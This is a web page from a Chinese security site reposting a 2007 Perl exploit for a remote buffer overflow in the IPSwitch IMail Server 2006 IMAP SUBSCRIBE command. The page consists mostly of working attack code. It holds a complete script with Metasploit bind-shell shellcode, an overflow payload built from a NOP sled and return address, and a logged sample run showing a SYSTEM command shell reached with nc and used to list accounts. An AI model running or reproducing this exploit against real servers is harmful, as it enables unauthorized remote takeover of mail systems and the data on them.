首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 IPSwitch IMail Server 2006 9.10 SUBSCRIBE Remote Overflow Exploit 来源：www.ph4nt0m.org 作者：yunshu 发布时间：2007-07-27   #!/use/bin/perl # Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1 # Code by yunshu, our team: www.ph4nt0m.org  Mail list: http://list.ph4nt0m.org #F:\>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass #* OK IMAP4 Server (IMail 9.10) #0 OK LOGIN completed #* FLAGS (\Answered \Flagged \Deleted \Seen \Draft) #* 0 EXISTS #* 0 RECENT #* OK [UIDVALIDITY 1185270594] UIDs valid #* OK [UIDNEXT 485270595] Predicted next UID #2 OK [READ-WRITE] SELECT completed #3 OK SUBSCRIBE completed #Trying.. #Bingle!Maybe get it! #You can try to telnet 22 port, do you have nc? #D:\Microsoft Visual Studio 8\VC>nc -vv 192.168.1.2 22 #192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA #(UNKNOWN) [192.168.1.2] 22 (?) open #Microsoft Windows [.. 5.2.3790] #(C) .... 1985-2003 Microsoft Corp. #C:\WINDOWS\system32>net user #net user #\\ ..... #------------------------------------------------------------------------------- #Administrator            ASPNET                   Guest #IUSR_WIN2K3              IWAM_WIN2K3              SUPPORT_388945a0 #.................. #C:\WINDOWS\system32> use strict; use warnings; use IO::Socket; if( @ARGV != 3 ) { my $banner = qq{ Imail subscribe exploit, Test on Imail 2006(9.10),windows 2003 Chinese SP1 You must have a account to login the imap server, good luck! Code by yunshu, our team www.ph4nt0m.org, enjoin this exp~~ imail_subscribe.pl  <host>   <username>   <password> }; print $banner."\n"; exit( -1 ); } my $host = $ARGV[0]; my $user = $ARGV[1]; my $pass = $ARGV[2]; # win32_bind -  EXITFUNC=thread LPORT=22 Size=344 Encoder=Pex http://metasploit.com my $shellcode = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x41". "\xd1\xfd\xbc\x83\xeb\xfc\xe2\xf4\xbd\xbb\x16\xf1\xa9\x28\x02\x43". "\xbe\xb1\x76\xd0\x65\xf5\x76\xf9\x7d\x5a\x81\xb9\x39\xd0\x12\x37". "\x0e\xc9\x76\xe3\x61\xd0\x16\xf5\xca\xe5\x76\xbd\xaf\xe0\x3d\x25". "\xed\x55\x3d\xc8\x46\x10\x37\xb1\x40\x13\x16\x48\x7a\x85\xd9\x94". "\x34\x34\x76\xe3\x65\xd0\x16\xda\xca\xdd\xb6\x37\x1e\xcd\xfc\x57". "\x42\xfd\x76\x35\x2d\xf5\xe1\xdd\x82\xe0\x26\xd8\xca\x92\xcd\x37". "\x01\xdd\x76\xcc\x5d\x7c\x76\xfc\x49\x8f\x95\x32\x0f\xdf\x11\xec". "\xbe\x07\x9b\xef\x27\xb9\xce\x8e\x29\xa6\x8e\x8e\x1e\x85\x02\x6c". "\x29\x1a\x10\x40\x7a\x81\x02\x6a\x1e\x58\x18\xda\xc0\x3c\xf5\xbe". "\x14\xbb\xff\x43\x91\xb9\x24\xb5\xb4\x7c\xaa\x43\x97\x82\xae\xef". "\x12\x82\xbe\xef\x02\x82\x02\x6c\x27\xb9\xfd\xaa\x27\x82\x74\x5d". "\xd4\xb9\x59\xa6\x31\x16\xaa\x43\x97\xbb\xed\xed\x14\x2e\x2d\xd4". "\xe5\x7c\xd3\x55\x16\x2e\x2b\xef\x14\x2e\x2d\xd4\xa4\x98\x7b\xf5". "\x16\x2e\x2b\xec\x15\x85\xa8\x43\x91\x42\x95\x5b\x38\x17\x84\xeb". "\xbe\x07\xa8\x43\x91\xb7\x97\xd8\x27\xb9\x9e\xd1\xc8\x34\x97\xec". "\x18\xf8\x31\x35\xa6\xbb\xb9\x35\xa3\xe0\x3d\x4f\xeb\x2f\xbf\x91". "\xbf\x93\xd1\x2f\xcc\xab\xc5\x17\xea\x7a\x95\xce\xbf\x62\xeb\x43". "\x34\x95\x02\x6a\x1a\x86\xaf\xed\x10\x80\x97\xbd\x10\x80\xa8\xed". "\xbe\x01\x95\x11\x98\xd4\x33\xef\xbe\x07\x97\x43\xbe\xe6\x02\x6c". "\xca\x86\x01\x3f\x85\xb5\x02\x6a\x13\x2e\x2d\xd4\xae\x1f\x1d\xdc". "\x12\x2e\x2b\x43\x91\xd1\xfd\xbc"; my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>"143", proto=>"tcp" ) || die "Connect error.\n"; my $res = <$sock>; print $res; if( $res !~ /OK/ ) { exit( -1 ); } my $opcode = "\x60\x1A\x9C\x76"; #my $opcode = "\x61\x62\x63\x64"; my $num = 264991; my $nop = "#IMAILPUB" . "\x90" x ( $num - length($shellcode) ).$shellcode."\x90\x90\xeb\x06".$opcode."\x90\x90\x90\x90"."\xE9\x44\xfd\xff\xff"."\x90" x 400; # login print $sock "0 LOGIN $user $pass\r\n"; $res = <$sock>; if( ! defined($res) ) { exit(-1); } print $res; if( $res !~ /OK/ ) { exit(-1); } print $sock "2 SELECT INBOX\r\n"; while( <$sock> ) { print $_; if( $_ =~ /2 OK/ || $_ =~ /2 BAD/ ) { last; } } print $sock "3 SUBSCRIBE \"$nop\"\r\n"; $res = <$sock>; if( ! defined($res) ) { exit(-1); } print $res; print "Trying..\n"; sleep( 15 ); print "Bingle! Maybe get it!\nYou can try to telnet 22 port, do you have nc?\n"; print $sock "4 LOGOUT\r\n"; print <$sock>; $sock->close();   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·PHP php_gd2.dll imagepsloadfon ·CrystalPlayer 1.98 Playlist Cr ·Clever Internet ActiveX Suite ·Nessus Vulnerability Scanner 3 ·IPSwitch IMail Server 2006 SEA ·IBM AIX <= 5.3 sp6 capture Ter ·PHP 5.2.3 tidy_parse_string() ·IBM AIX <= 5.3 sp6 pioout Arbi ·PHP <= 5.2.3 snmpget() object ·IBM AIX <= 5.3 sp6 ftp gets() ·Windows RSH daemon 1.7 Remote ·PHP 5.x (win32service) Local S   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved